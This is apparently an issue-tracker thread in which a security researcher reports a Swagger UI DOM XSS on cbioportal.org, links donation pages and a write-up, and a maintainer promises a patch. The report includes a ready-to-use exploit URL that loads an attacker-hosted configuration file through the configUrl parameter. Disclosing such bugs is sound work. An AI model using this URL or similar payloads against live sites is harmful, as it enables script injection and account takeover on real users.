Swagger-UI XSS - cbioportal.org‏‏‏‏‏‏

[דוד בוזגלו‎]

Hello,

My name is David and I am a security researcher. 

In our search we found the following Swagger XSS.

Swagger UI is a really common library used to display API specifications in a nice-looking UI used by almost every company. I stumbled upon it many times when doing recon on bug bounty targets and decided to take a closer look at it in Nov 2020. On Twitch, I streamed the process of reviewing and finding bugs in the library, but I found the final payload off camera after the stream. The bug that I found was a DOM XSS, and it turned out that there were a lot of vulnerable instances.

Url : https://www.cbioportal.org/api/swagger-ui/index.html?configUrl=https://jumpy-floor.surge.sh/test.json

Read More here : 
https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

Liked my Bug ? Buy me a coffee (or more likely a Beer X2)

https://www.paypal.com/paypalme/bugbounty1/150USD

https://www.paypal.com/paypalme/bugbounty1/75USD 

https://www.buymeacoffee.com/bugbounty

Help me to continue to protect others Information .

[Luke Sikina]

Hi David,

Thanks for the repro! We have a patch for this that will go live next week.